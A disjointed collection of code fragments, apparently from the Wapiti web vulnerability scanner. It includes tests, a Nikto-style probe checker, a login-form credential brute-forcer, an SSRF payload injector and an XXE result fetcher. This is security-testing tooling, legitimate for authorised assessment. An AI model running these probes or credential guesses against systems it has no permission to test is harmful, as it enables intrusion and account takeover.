                    conn.close()
                    return 200, {}, "Unknown user"
                else:
                    cursor.close()
                    conn.close()
                    if row:
                        return 200, {}, "Welcome, your user ID is {}".format(row[0])
                    else:
                        return 200, {}, "Unknown user"

        responses.add_callback(
            responses.GET,
            re.compile(r"http://perdu.com/\?username=.*"),
            callback=process
        )

        persister = FakePersister()
        request = Request("http://perdu.com/?username=admin")
        request.path_id = 1

        crawler = Crawler("http://perdu.com/", timeout=1)
        options = {"timeout": 10, "level": 1}
        logger = Mock()

        module = mod_sql(crawler, persister, logger, options)
        module.verbose = 2
        module.do_post = True
        module.attack(request)

        assert persister.vulnerabilities
        # This is the same test as the previous blind one, except we have to put single quotes
        assert len(responses.calls) == 8
async def attack(self, request: Request):
    try:
        with open(os.path.join(self.user_config_dir, self.NIKTO_DB)) as nikto_db_file:
            reader = csv.reader(nikto_db_file)
            self.nikto_db = [line for line in reader if line != [] and line[0].isdigit()]
    except IOError:
        print(_("Problem with local nikto database."))
        print(_("Downloading from the web..."))
        await self.update()

    self.finished = True
    junk_string = "w" + "".join(
        [random.choice("0123456789abcdefghjijklmnopqrstuvwxyz") for __ in range(0, 5000)]
    )
    urls = self.persister.get_links(attack_module=self.name) if self.do_get else []
    server = next(urls).hostname

    for line in self.nikto_db:
        if self._stop_event.is_set():
            break

        match = match_or = match_and = False
        fail = fail_or = False

        osv_id = line[1]
        path = line[3]
        method = line[4]
        vuln_desc = line[10]
        post_data = line[11]

        path = path.replace("@CGIDIRS", "/cgi-bin/")
        path = path.replace("@ADMIN", "/admin/")
        path = path.replace("@NUKE", "/modules/")
        path = path.replace("@PHPMYADMIN", "/phpMyAdmin/")
        path = path.replace("@POSTNUKE", "/postnuke/")
        path = re.sub(r"JUNK\((\d+)\)", lambda x: junk_string[:int(x.group(1))], path)

        if path[0] == "@":
            continue

        if not path.startswith("/"):
            path = "/" + path

        try:
            url = "http://" + server + path
        except UnicodeDecodeError:
            continue

        if method == "GET":
            evil_request = Request(url)
        else:
            evil_request = Request(url, post_params=post_data, method=method)

        if self.verbose == 2:
            if method == "GET":
                print("[¨] {0}".format(evil_request.url))
            else:
                print("[¨] {0}".format(evil_request.http_repr()))

        try:
            response = await self.crawler.async_send(evil_request)
        except RequestError:
            self.network_errors += 1
            continue
        except ValueError:
            # ValueError raised by urllib3 (Method cannot contain non-token characters), we don't want to raise
            continue

        page = response.content
        code = response.status
        raw = " ".join([x + ": " + y for x, y in response.headers.items()])
        raw += page

        # First condition (match)
        if len(line[5]) == 3 and line[5].isdigit():
            if code == int(line[5]):
                match = True
        else:
            if line[5] in raw:
                match = True

        # Second condition (or)
        if line[6] != "":
            if len(line[6]) == 3 and line[6].isdigit():
                if code == int(line[6]):
                    match_or = True
            else:
                if line[6] in raw:
                    match_or = True

        # Third condition (and)
        if line[7] != "":
            if len(line[7]) == 3 and line[7].isdigit():
                if code == int(line[7]):
                    match_and = True
            else:
                if line[7] in raw:
                    match_and = True
        else:
            match_and = True

        # Fourth condition (fail)
        if line[8] != "":
            if len(line[8]) == 3 and line[8].isdigit():
                if code == int(line[8]):
                    fail = True
            else:
                if line[8] in raw:
                    fail = True

        # Fifth condition (or)
        if line[9] != "":
            if len(line[9]) == 3 and line[9].isdigit():
                if code == int(line[9]):
                    fail_or = True
            else:
                if line[9] in raw:
                    fail_or = True

        if ((match or match_or) and match_and) and not (fail or fail_or):
            self.log_red("---")
            self.log_red(vuln_desc)
            self.log_red(url)

            refs = []
            if osv_id != "0":
                refs.append("https://vulners.com/osvdb/OSVDB:" + osv_id)

            # CERT
            cert_advisory = re.search("(CA-[0-9]{4}-[0-9]{2})", vuln_desc)
            if cert_advisory is not None:
                refs.append("http://www.cert.org/advisories/" + cert_advisory.group(0) + ".html")

            # SecurityFocus
            securityfocus_bid = re.search("BID-([0-9]{4})", vuln_desc)
            if securityfocus_bid is not None:
                refs.append("http://www.securityfocus.com/bid/" + securityfocus_bid.group(1))

            # Mitre.org
            mitre_cve = re.search("((CVE|CAN)-[0-9]{4}-[0-9]{4,})", vuln_desc)
            if mitre_cve is not None:
                refs.append("http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + mitre_cve.group(0))

            # CERT Incidents
            cert_incident = re.search("(IN-[0-9]{4}-[0-9]{2})", vuln_desc)
            if cert_incident is not None:
                refs.append("http://www.cert.org/incident_notes/" + cert_incident.group(0) + ".html")

            # Microsoft Technet
            ms_bulletin = re.search("(MS[0-9]{2}-[0-9]{3})", vuln_desc)
            if ms_bulletin is not None:
                refs.append("http://www.microsoft.com/technet/security/bulletin/" + ms_bulletin.group(0) + ".asp")

            info = vuln_desc
            if refs:
                self.log_red(_("References:"))
                self.log_red(" {0}".format("\n ".join(refs)))

                info += "\n" + _("References:") + "\n"
                info += "\n".join(refs)

            self.log_red("---")
            self.add_vuln(category=NAME, level=HIGH_LEVEL, request=evil_request, info=info)
def attack(self):
    """Launch the attacks based on the preferences set by the command line"""
    self._init_attacks()

    for attack_module in self.attacks:
        start = datetime.utcnow()
        if attack_module.do_get is False and attack_module.do_post is False:
            continue

        print('')
        if attack_module.require:
            attack_name_list = [
                attack.name for attack in self.attacks
                if attack.name in attack_module.require and (attack.do_get or attack.do_post)
            ]

            if attack_module.require != attack_name_list:
                print(_("[!] Missing dependencies for module {0}:").format(attack_module.name))
                print(" {0}".format(
                    ",".join([attack for attack in attack_module.require if attack not in attack_name_list])
                ))
                continue

            attack_module.load_require(
                [attack for attack in self.attacks if attack.name in attack_module.require]
            )

        attack_module.log_green(_("[*] Launching module {0}"), attack_module.name)

        already_attacked = self.persister.count_attacked(attack_module.name)
        if already_attacked:
            attack_module.log_green(
                _("[*] {0} pages were previously attacked and will be skipped"),
                already_attacked
            )

        resources_to_attack = []
        if attack_module.do_get:
            resources_to_attack.append(self.persister.get_links(attack_module=attack_module.name))
        if attack_module.do_post:
            resources_to_attack.append(self.persister.get_forms(attack_module=attack_module.name))

        generator = chain.from_iterable(resources_to_attack)
        answer = "0"

        while True:
            try:
                original_request = next(generator)
                if attack_module.must_attack(original_request):
                    if self.verbose >= 1:
                        print("[+] {}".format(original_request))

                    attack_module.attack(original_request)

                if (datetime.utcnow() - start).total_seconds() > self._max_attack_time >= 1:
                    print(_("Max attack time was reached for module {0}, stopping.").format(attack_module.name))
                    break
            except KeyboardInterrupt as exception:
                print('')
                print(_("Attack process was interrupted. Do you want to:"))
                print(_("\tr) stop everything here and generate the (R)eport"))
                print(_("\tn) move to the (N)ext attack module (if any)"))
                print(_("\tq) (Q)uit without generating the report"))
                print(_("\tc) (C)ontinue the current attack"))

                while True:
                    try:
                        answer = input("? ").strip().lower()
                    except UnicodeDecodeError:
                        pass

                    if answer not in ("r", "n", "q", "c"):
                        print(_("Invalid choice. Valid choices are r, n, q and c."))
                    else:
                        break

                if answer in ("r", "n"):
                    break

                if answer == "c":
                    continue

                # if answer is q, raise KeyboardInterrupt and it will stop cleanly
                raise exception
            except RequestException:
                # Hmm, it should be caught inside the module
                sleep(1)
                continue
            except StopIteration:
                break
            except Exception as exception:
                # Catch every possible exception and print it
                exception_traceback = sys.exc_info()[2]
                print(exception.__class__.__name__, exception)
                print_tb(exception_traceback)

                if self._bug_report:
                    traceback_file = str(uuid1())
                    with open(traceback_file, "w") as traceback_fd:
                        print_tb(exception_traceback, file=traceback_fd)
                        print("{}: {}".format(exception.__class__.__name__, exception), file=traceback_fd)
                        print("Occurred in {} on {}".format(attack_module.name, self.target_url), file=traceback_fd)
                        print(
                            "{}. Requests {}. OS {}".format(WAPITI_VERSION, requests.__version__, sys.platform),
                            file=traceback_fd
                        )

                    try:
                        upload_request = Request(
                            "https://wapiti3.ovh/upload.php",
                            file_params=[["crash_report", [traceback_file, open(traceback_file, "rb").read()]]]
                        )
                        page = self.crawler.send(upload_request)
                        print(_("Sending crash report {} ... {}").format(traceback_file, page.content))
                    except RequestException:
                        print(_("Error sending crash report"))

                    os.unlink(traceback_file)
            else:
                if original_request.path_id is not None:
                    self.persister.set_attacked(original_request.path_id, attack_module.name)

        if hasattr(attack_module, "finish"):
            attack_module.finish()

        if attack_module.network_errors:
            print(_("{} requests were skipped due to network issues").format(attack_module.network_errors))

        # "r" means stop everything here and generate the report
        if answer == "r":
            break

    # if self.crawler.get_uploads():
    #     print('')
    #     print(_("Upload scripts found:"))
    #     print("----------------------")
    #     for upload_form in self.crawler.get_uploads():
    #         print(upload_form)

    if not self.output_file:
        if self.report_generator_type == "html":
            self.output_file = self.COPY_REPORT_DIR
        else:
            filename = "{}_{}".format(
                self.server.replace(":", "_"),
                strftime("%m%d%Y_%H%M", self.report_gen.scan_date)
            )
            self.output_file = filename + "." + self.report_generator_type

    for payload in self.persister.get_payloads():
        if payload.type == "vulnerability":
            self.report_gen.add_vulnerability(
                category=payload.category,
                level=payload.level,
                request=payload.evil_request,
                parameter=payload.parameter,
                info=payload.info
            )
        elif payload.type == "anomaly":
            self.report_gen.add_anomaly(
                category=payload.category,
                level=payload.level,
                request=payload.evil_request,
                parameter=payload.parameter,
                info=payload.info
            )
        elif payload.type == "additional":
            self.report_gen.add_additional(
                category=payload.category,
                level=payload.level,
                request=payload.evil_request,
                parameter=payload.parameter,
                info=payload.info
            )

    self.report_gen.generate_report(self.output_file)

    print('')
    print(_("Report"))
    print("------")
    print(_("A report has been generated in the file {0}").format(self.output_file))
    if self.report_generator_type == "html":
        print(_("Open {0} with a browser to see this report.").format(self.report_gen.final_path))
def attack(self):
    http_resources = self.persister.get_links(attack_module=self.name) if self.do_get else []
    forms = self.persister.get_forms(attack_module=self.name) if self.do_post else []

    for original_request in chain(http_resources, forms):
        # We leverage the fact that the crawler will fill password entries with a known placeholder
        if "Letm3in_" not in (original_request.encoded_data + original_request.encoded_params):
            continue

        # We may want to remove this but if not available fallback to target URL
        if not original_request.referer:
            continue

        if self.verbose >= 1:
            print("[+] {}".format(original_request))

        request = Request(original_request.referer)
        page = self.crawler.get(request, follow_redirects=True)

        login_form, username_field_idx, password_field_idx = page.find_login_form()
        if not login_form:
            continue

        failure_text = self.test_credentials(
            login_form, username_field_idx, password_field_idx, "invalid", "invalid"
        )

        if self.check_success_auth(failure_text):
            # Ignore this case as it raises false positives
            continue

        for username, password in product(self.get_usernames(), self.get_passwords()):
            response = self.test_credentials(
                login_form, username_field_idx, password_field_idx, username, password
            )

            if self.check_success_auth(response) and failure_text != response:
                vuln_message = _("Credentials found for URL {} : {} / {}").format(
                    original_request.referer, username, password
                )

                # Recreate the request that succeeded in order to print and store it
                post_params = login_form.post_params
                get_params = login_form.get_params

                if login_form.method == "POST":
                    post_params[username_field_idx][1] = username
                    post_params[password_field_idx][1] = password
                else:
                    get_params[username_field_idx][1] = username
                    get_params[password_field_idx][1] = password

                evil_request = web.Request(
                    path=login_form.url,
                    method=login_form.method,
                    post_params=post_params,
                    get_params=get_params,
                    referer=login_form.referer,
                    link_depth=login_form.link_depth
                )

                self.add_vuln(
                    request_id=original_request.path_id,
                    category=NAME,
                    level=HIGH_LEVEL,
                    request=evil_request,
                    info=vuln_message
                )

                self.log_red("---")
                self.log_red(vuln_message)
                self.log_red(Messages.MSG_EVIL_REQUEST)
                self.log_red(evil_request.http_repr())
                self.log_red("---")
                break

        yield original_request
def test_reports(): for report_format, report_class in GENERATORS.items(): report_gen = report_class() report_gen.set_report_info( "http://perdu.com", "folder", gmtime(), "WAPITI_VERSION", { "method": "post", "url": "http://testphp.vulnweb.com/login.php", "logged_in": True, "form": { "login_field": "uname", "password_field": "pass" } }, 123456) for vul in vulnerabilities: report_gen.add_vulnerability_type( vul.NAME, vul.DESCRIPTION, vul.SOLUTION, flatten_references(vul.REFERENCES)) for anomaly in anomalies: report_gen.add_anomaly_type(anomaly.NAME, anomaly.DESCRIPTION, anomaly.SOLUTION, flatten_references(anomaly.REFERENCES)) for additional in additionals: report_gen.add_additional_type( additional.NAME, additional.DESCRIPTION, additional.SOLUTION, flatten_references(additional.REFERENCES)) if report_format == "html": temp_obj = tempfile.TemporaryDirectory() else: temp_obj = tempfile.NamedTemporaryFile(delete=False) output = temp_obj.name print("Using report type '{}'".format(report_format)) request = Request("http://perdu.com/riri?foo=bar") report_gen.add_vulnerability( category=_("Reflected Cross Site Scripting"), level=1, request=request, parameter="foo", info="This is dope", module="xss") request = Request("http://perdu.com/fifi?foo=bar") report_gen.add_anomaly(category=_("Internal Server Error"), level=2, request=request, parameter="foo", info="This is the way", module="xss") request = Request("http://perdu.com/?foo=bar") report_gen.add_additional(category=_("Fingerprint web technology"), level=3, request=request, parameter="foo", info="loulou", module="wapp") report_gen.generate_report(output) if report_format == "html": output = report_gen.final_path with open(output) as fd: report = fd.read() assert "riri" in report assert "fifi" in report assert "loulou" in report assert "http://testphp.vulnweb.com/login.php" in report assert "uname" in report assert "pass" in report # the csv report only contains vulnerabilities without the info section if report_format != "csv": assert "123456" in report
async def process_line(self, line):
    match = match_or = match_and = False
    fail = fail_or = False

    osv_id = line[1]
    path = line[3]
    method = line[4]
    vuln_desc = line[10]
    post_data = line[11]

    path = path.replace("@CGIDIRS", "/cgi-bin/")
    path = path.replace("@ADMIN", "/admin/")
    path = path.replace("@NUKE", "/modules/")
    path = path.replace("@PHPMYADMIN", "/phpMyAdmin/")
    path = path.replace("@POSTNUKE", "/postnuke/")
    path = re.sub(r"JUNK\((\d+)\)", lambda x: self.junk_string[:int(x.group(1))], path)

    if path[0] == "@":
        return

    if not path.startswith("/"):
        path = "/" + path

    try:
        url = f"{self.parts.scheme}://{self.parts.netloc}{path}"
    except UnicodeDecodeError:
        return

    if method == "GET":
        evil_request = Request(url)
    else:
        evil_request = Request(url, post_params=post_data, method=method)

    if method == "GET":
        log_verbose(f"[¨] {evil_request.url}")
    else:
        log_verbose(f"[¨] {evil_request.http_repr()}")

    try:
        response = await self.crawler.async_send(evil_request)
        page = response.content
        code = response.status
    except (RequestError, ConnectionResetError):
        self.network_errors += 1
        return
    except Exception as exception:
        logging.warning(f"{exception} occurred with URL {evil_request.url}")
        return

    raw = " ".join([x + ": " + y for x, y in response.headers.items()])
    raw += page

    # See https://github.com/sullo/nikto/blob/master/program/plugins/nikto_tests.plugin for reference
    expected_status_codes = []
    # First condition (match)
    if len(line[5]) == 3 and line[5].isdigit():
        expected_status_code = int(line[5])
        expected_status_codes.append(expected_status_code)

        if code == expected_status_code:
            match = True
    else:
        if line[5] in raw:
            match = True

    # Second condition (or)
    if line[6] != "":
        if len(line[6]) == 3 and line[6].isdigit():
            expected_status_code = int(line[6])
            expected_status_codes.append(expected_status_code)

            if code == expected_status_code:
                match_or = True
        else:
            if line[6] in raw:
                match_or = True

    # Third condition (and)
    if line[7] != "":
        if len(line[7]) == 3 and line[7].isdigit():
            if code == int(line[7]):
                match_and = True
        else:
            if line[7] in raw:
                match_and = True
    else:
        match_and = True

    # Fourth condition (fail)
    if line[8] != "":
        if len(line[8]) == 3 and line[8].isdigit():
            if code == int(line[8]):
                fail = True
        else:
            if line[8] in raw:
                fail = True

    # Fifth condition (or)
    if line[9] != "":
        if len(line[9]) == 3 and line[9].isdigit():
            if code == int(line[9]):
                fail_or = True
        else:
            if line[9] in raw:
                fail_or = True

    if ((match or match_or) and match_and) and not (fail or fail_or):
        if expected_status_codes:
            if await self.is_false_positive(evil_request, expected_status_codes):
                return

        log_red("---")
        log_red(vuln_desc)
        log_red(url)

        refs = []
        if osv_id != "0":
            refs.append("https://vulners.com/osvdb/OSVDB:" + osv_id)

        # CERT
        cert_advisory = re.search("(CA-[0-9]{4}-[0-9]{2})", vuln_desc)
        if cert_advisory is not None:
            refs.append("http://www.cert.org/advisories/" + cert_advisory.group(0) + ".html")

        # SecurityFocus
        securityfocus_bid = re.search("BID-([0-9]{4})", vuln_desc)
        if securityfocus_bid is not None:
            refs.append("http://www.securityfocus.com/bid/" + securityfocus_bid.group(1))

        # Mitre.org
        mitre_cve = re.search("((CVE|CAN)-[0-9]{4}-[0-9]{4,})", vuln_desc)
        if mitre_cve is not None:
            refs.append("http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + mitre_cve.group(0))

        # CERT Incidents
        cert_incident = re.search("(IN-[0-9]{4}-[0-9]{2})", vuln_desc)
        if cert_incident is not None:
            refs.append("http://www.cert.org/incident_notes/" + cert_incident.group(0) + ".html")

        # Microsoft Technet
        ms_bulletin = re.search("(MS[0-9]{2}-[0-9]{3})", vuln_desc)
        if ms_bulletin is not None:
            refs.append("http://www.microsoft.com/technet/security/bulletin/" + ms_bulletin.group(0) + ".asp")

        info = vuln_desc
        if refs:
            log_red(_("References:"))
            log_red(" " + "\n ".join(refs))

            info += "\n" + _("References:") + "\n"
            info += "\n".join(refs)

        log_red("---")

        await self.add_vuln_high(
            category=NAME,
            request=evil_request,
            info=info,
            wstg=WSTG_CODE
        )
async def test_request_object():
    res1 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'd']])
    res2 = Request("http://httpbin.org/post?var1=a&var2=z", post_params=[['post1', 'c'], ['post2', 'd']])
    res3 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'z']])
    res4 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'd']])
    res5 = Request("http://httpbin.org/post?var1=z&var2=b", post_params=[['post1', 'c'], ['post2', 'd']])
    res6 = Request("http://httpbin.org/post?var3=z&var2=b", post_params=[['post1', 'c'], ['post2', 'd']])
    res7 = Request("http://httpbin.org/post?var1=z&var2=b&var4=e", post_params=[['post1', 'c'], ['post2', 'd']])
    res8 = Request("http://httpbin.org/post?var2=d&var1=z", post_params=[['post1', 'c'], ['post2', 'd']])
    res10 = Request("http://httpbin.org/post?qs0", post_params=[['post1', 'c'], ['post2', 'd']])
    res11 = Request("http://httpbin.org/post?qs1", post_params=[['post1', 'c'], ['post2', 'd']])
    res12 = Request(
        "http://httpbin.org/post?qs1",
        post_params=[['post1', 'c'], ['post2', 'd']],
        file_params=[['file1', ('fname1', 'content')], ['file2', ('fname2', 'content')]]
    )
    res13 = Request("https://www.youtube.com/user/OneMinuteSilenceBand/videos")
    res14 = Request("https://www.youtube.com/user/OneMinuteSilenceBand/")
    res15 = Request("https://duckduckgo.com/")
    res16 = Request("https://duckduckgo.com/", post_params=[['q', 'Kung Fury']])
    res17 = Request("http://example.com:8080/dir/?x=3")
    res18 = Request("http://httpbin.org/get?a=1", get_params=[['get1', 'c'], ['get2', 'd']])

    assert res1 < res2
    assert res2 > res3
    assert res1 < res3
    assert res1 == res4
    assert hash(res1) == hash(res4)
    res4.link_depth = 5
    assert hash(res1) == hash(res4)
    assert res1 != res2
    assert res2 >= res1
    assert res1 <= res3
    assert res13.file_name == "videos"
    assert res10.path == "http://httpbin.org/post"
    assert res10.file_name == "post"
    # This one is important as it could break attacks on query string
    assert res10.url == "http://httpbin.org/post?qs0"
    assert res13.parent_dir == res14.url
    assert res15.is_root
    assert res15.parent_dir == res15.url
    assert res13.dir_name == res14.url
    assert res14.dir_name == res14.url
    assert res15.dir_name == res15.url
    assert res15 != res16

    query_list = [res15]
    assert res16 not in query_list
    assert res17.dir_name == "http://example.com:8080/dir/"
    assert res18.url == "http://httpbin.org/get?get1=c&get2=d"
    assert res17.hostname == "example.com:8080"
    assert res1.encoded_get_keys == res8.encoded_get_keys
    assert res17.encoded_get_keys == "x"
    assert res16.encoded_get_keys == ""
    assert res12.parameters_count == 5
    assert res12.encoded_get_keys == "qs1"
    assert res5.hash_params == res8.hash_params
    assert res7.hash_params != res8.hash_params
    assert res6 in [res6, res11]
    assert res6 not in [res11, None]
    assert res11 in [res6, res11]
    assert res11 not in [None, res6]

    print("Tests were successful, now launching representations")
    print("=== Basic representation follows ===")
    print(res1)
    print("=== cURL representation follows ===")
    print(res1.curl_repr)
    print("=== HTTP representation follows ===")
    print(res1.http_repr())
    print("=== POST parameters as an array ===")
    print(res1.post_params)
    print("=== POST keys encoded as string ===")
    print(res1.encoded_post_keys)
    print("=== Upload HTTP representation ===")
    print(res12.http_repr())
    print("=== Upload basic representation ===")
    print(res12)
    print("=== Upload cURL representation ===")
    print(res12.curl_repr)
    print("=== HTTP GET keys as a tuple ===")
    print(res1.get_keys)
    print("=== HTTP POST keys as a tuple ===")
    print(res1.post_keys)
    print("=== HTTP files keys as a tuple ===")
    print(res12.file_keys)
    print('')

    json_req = Request(
        "http://httpbin.org/post?a=b",
        post_params=json.dumps({"z": 1, "a": 2}),
        enctype="application/json"
    )
    crawler = AsyncCrawler("http://httpbin.org/")
    page = await crawler.async_send(json_req)
    assert page.json["json"] == {"z": 1, "a": 2}
    assert page.json["headers"]["Content-Type"] == "application/json"
    assert page.json["form"] == {}

    page = await crawler.async_send(res12)
    assert page.json["files"]

    res19 = Request(
        "http://httpbin.org/post?qs1",
        post_params=[['post1', 'c'], ['post2', 'd']],
        file_params=[['file1', ('fname1', 'content')], ['file2', ('fname2', 'content')]],
        enctype="multipart/form-data"
    )
    page = await crawler.async_send(res19)
    assert page.json["files"]
    await crawler.close()
async def _dump_url_content_to_file(self, url: str, file_path: str): request = Request(url) response = await self.crawler.async_send(request) with open(file_path, 'w', encoding='utf-8') as file: json.dump(response.json, file)
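# A standalone sketch of the helper above using httpx directly instead of the
# crawler wrapper (assumption: the URL returns a JSON body); handy for testing
# the dump logic in isolation.
import json
import httpx

async def dump_url_json_to_file(url: str, file_path: str):
    async with httpx.AsyncClient() as client:
        response = await client.get(url)
        with open(file_path, 'w', encoding='utf-8') as file:
            json.dump(response.json(), file)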
def test_plugin():
    # Response telling that WordPress is used
    responses.add(
        responses.GET,
        url="http://perdu.com/",
        body="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \
        <h2>Pas de panique, on va wordpress vous aider</h2> \
        Wordpress wordpress WordPress\
        <strong><pre> * <----- vous êtes ici</pre></strong></body></html>"
    )

    # Response for the versioned plugin
    responses.add(
        responses.GET,
        url="http://perdu.com/wp-content/plugins/bbpress/readme.txt",
        body="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \
        <h2>Pas de panique, on va wordpress vous aider</h2> \
        Wordpress wordpress WordPress\
        Stable tag: 2.6.6 \
        <strong><pre> * <----- vous êtes ici</pre></strong></body></html>"
    )

    # Response for a plugin detected without version (403 forbidden response)
    responses.add(
        responses.GET,
        url="http://perdu.com/wp-content/plugins/wp-reset/readme.txt",
        body="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \
        <h2>Pas de panique, on va wordpress vous aider</h2> \
        Wordpress wordpress WordPress\
        Stable tag: 9.5.1 \
        <strong><pre> * <----- vous êtes ici</pre></strong></body></html>",
        status=403
    )

    # Response for a badly formatted readme.txt of a plugin
    responses.add(
        responses.GET,
        url="http://perdu.com/wp-content/plugins/unyson/readme.txt",
        body="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \
        <h2>Pas de panique, on va wordpress vous aider</h2> \
        Wordpress wordpress WordPress\
        Version Tested : 4.5 \
        <strong><pre> * <----- vous êtes ici</pre></strong></body></html>"
    )

    responses.add(
        responses.GET,
        url=re.compile(r"http://perdu.com/wp-content/plugins/.*?/readme.txt"),
        status=404
    )

    responses.add(
        responses.GET,
        url=re.compile(r"http://perdu.com/wp-content/themes/.*?/readme.txt"),
        status=404
    )

    persister = FakePersister()
    request = Request("http://perdu.com")
    request.path_id = 1
    crawler = Crawler("http://perdu.com")
    options = {"timeout": 10, "level": 2}
    logger = Mock()

    module = mod_wp_enum(crawler, persister, logger, options)
    module.verbose = 2
    module.attack(request)

    assert persister.additionals
    assert persister.additionals[0] == '{"name": "bbpress", "versions": ["2.6.6"], "categories": ["WordPress plugins"]}'
    assert persister.additionals[1] == '{"name": "wp-reset", "versions": [""], "categories": ["WordPress plugins"]}'
    assert persister.additionals[2] == '{"name": "unyson", "versions": [""], "categories": ["WordPress plugins"]}'
async def attack(self, request: Request): self.finished = True request_to_root = Request(request.url) categories_file_path = os.path.join(self.user_config_dir, self.WAPP_CATEGORIES) groups_file_path = os.path.join(self.user_config_dir, self.WAPP_GROUPS) technologies_file_path = os.path.join(self.user_config_dir, self.WAPP_TECHNOLOGIES) await self._verify_wapp_database(categories_file_path, technologies_file_path, groups_file_path) try: application_data = ApplicationData(categories_file_path, groups_file_path, technologies_file_path) except FileNotFoundError as exception: logging.error(exception) logging.error( _("Try using --store-session option, or update apps.json using --update option." )) return except ApplicationDataException as exception: logging.error(exception) return detected_applications = await self._detect_applications( request.url, application_data) if len(detected_applications) > 0: log_blue("---") for application_name in sorted(detected_applications, key=lambda x: x.lower()): versions = detected_applications[application_name]["versions"] categories = detected_applications[application_name]["categories"] groups = detected_applications[application_name]["groups"] log_blue(MSG_TECHNO_VERSIONED, application_name, versions) log_blue(MSG_CATEGORIES, categories) log_blue(MSG_GROUPS, groups) log_blue("") await self.add_addition( category=TECHNO_DETECTED, request=request_to_root, info=json.dumps(detected_applications[application_name]), wstg=TECHNO_DETECTED_WSTG_CODE) if versions: if "Web servers" in categories: await self.add_vuln_info( category=WEB_SERVER_VERSIONED, request=request_to_root, info=json.dumps( detected_applications[application_name]), wstg=WEB_SERVER_WSTG_CODE) else: await self.add_vuln_info( category=WEB_APP_VERSIONED, request=request_to_root, info=json.dumps( detected_applications[application_name]), wstg=WEB_APP_WSTG_CODE)
def mutate(self, request: Request): get_params = request.get_params post_params = request.post_params file_params = request.file_params referer = request.referer # estimation = self.estimate_requests_count(request) # # if self._attacks_per_url_pattern[request.hash_params] + estimation > self._max_queries_per_pattern: # # Otherwise (pattern already attacked), make sure we don't exceed maximum allowed # return # # self._attacks_per_url_pattern[request.hash_params] += estimation for params_list in [get_params, post_params, file_params]: for i in range(len(params_list)): param_name = quote(params_list[i][0]) if self._skip_list and param_name in self._skip_list: continue if self._parameters and param_name not in self._parameters: continue saved_value = params_list[i][1] if saved_value is None: saved_value = "" if params_list is file_params: params_list[i][1] = ["__PAYLOAD__", params_list[i][1][1]] else: params_list[i][1] = "__PAYLOAD__" attack_pattern = Request(request.path, method=request.method, get_params=get_params, post_params=post_params, file_params=file_params) if hash(attack_pattern) not in self._attack_hashes: self._attack_hashes.add(hash(attack_pattern)) payload = SSRF_PAYLOAD.format( external_endpoint=self._endpoint, random_id=self._session_id, path_id=request.path_id, hex_param=hexlify( param_name.encode("utf-8", errors="replace")).decode()) flags = set() if params_list is file_params: params_list[i][1][0] = payload flags.add(PayloadType.file) else: params_list[i][1] = payload if params_list is get_params: flags.add(PayloadType.get) else: flags.add(PayloadType.post) evil_req = Request(request.path, method=request.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer, link_depth=request.link_depth) yield evil_req, param_name, payload, flags params_list[i][1] = saved_value if not get_params and request.method == "GET" and self._qs_inject: attack_pattern = Request("{}?__PAYLOAD__".format(request.path), method=request.method, referer=referer, link_depth=request.link_depth) if hash(attack_pattern) not in self._attack_hashes: self._attack_hashes.add(hash(attack_pattern)) flags = set() payload = SSRF_PAYLOAD.format( external_endpoint=self._endpoint, random_id=self._session_id, path_id=request.path_id, hex_param=hexlify(b"QUERY_STRING").decode()) evil_req = Request("{}?{}".format(request.path, quote(payload)), method=request.method, referer=referer, link_depth=request.link_depth) flags.add(PayloadType.get) yield evil_req, "QUERY_STRING", payload, flags
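The endpoint later reports hits keyed by the hex-encoded parameter name built in mutate() above; a small round-trip with the standard binascii helpers shows the encoding (the parameter name here is illustrative):

from binascii import hexlify, unhexlify

param_name = "file"  # illustrative parameter name
hex_param = hexlify(param_name.encode("utf-8", errors="replace")).decode()
assert hex_param == "66696c65"                               # what the payload embeds
assert unhexlify(hex_param).decode("utf-8") == param_name    # what the results parser recovers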
async def test_persister_upload(): try: os.unlink("/tmp/crawl.db") except FileNotFoundError: pass persister = SqlPersister("/tmp/crawl.db") await persister.create() await persister.set_root_url("http://httpbin.org/") simple_upload = Request( "http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[["file1", ("'fname1", b"content", "text/plain")], ["file2", ("fname2", b"content", "text/plain")]]) xml_upload = Request("http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[[ "calendar", ("calendar.xml", b"<xml>Hello there</xml>", "application/xml") ]]) await persister.save_request(simple_upload) await persister.save_request(xml_upload) assert await persister.count_paths() == 2 stored_requests = set([__ async for __ in persister.get_to_browse()]) assert simple_upload in stored_requests assert xml_upload in stored_requests respx.post("http://httpbin.org/post?qs1").mock( return_value=httpx.Response(200, text="Hello there")) crawler = AsyncCrawler(Request("http://httpbin.org/")) for req in stored_requests: await crawler.async_send(req) await persister.save_request(req) if req == simple_upload: assert req.file_params == simple_upload.file_params assert req.file_params[0] == [ "file1", ("'fname1", b"content", "text/plain") ] assert req.file_params[1] == [ "file2", ("fname2", b"content", "text/plain") ] else: assert req.file_params == xml_upload.file_params assert req.file_params[0] == [ "calendar", ("calendar.xml", b"<xml>Hello there</xml>", "application/xml") ] naughty_file = Request("http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[[ "calendar", ("calendar.xml", b"<xml>XXE there</xml>", "application/xml") ]]) await persister.add_payload( 1, # request_id "vulnerability", # payload_type "exec", # module "Command Execution", # category 1, # level naughty_file, # request "calendar", # parameter "<xml>XXE there</xml>" # info ) payload = [__ async for __ in persister.get_payloads()][0] assert naughty_file == payload.evil_request assert payload.parameter == "calendar" assert len([ __ async for __ in persister.get_forms(path="http://httpbin.org/post") ]) == 2 await crawler.close()
async def finish(self):
    endpoint_url = "{}get_xxe.php?session_id={}".format(self.internal_endpoint, self._session_id)
    print(_("[*] Asking endpoint URL {} for results, please wait...").format(endpoint_url))
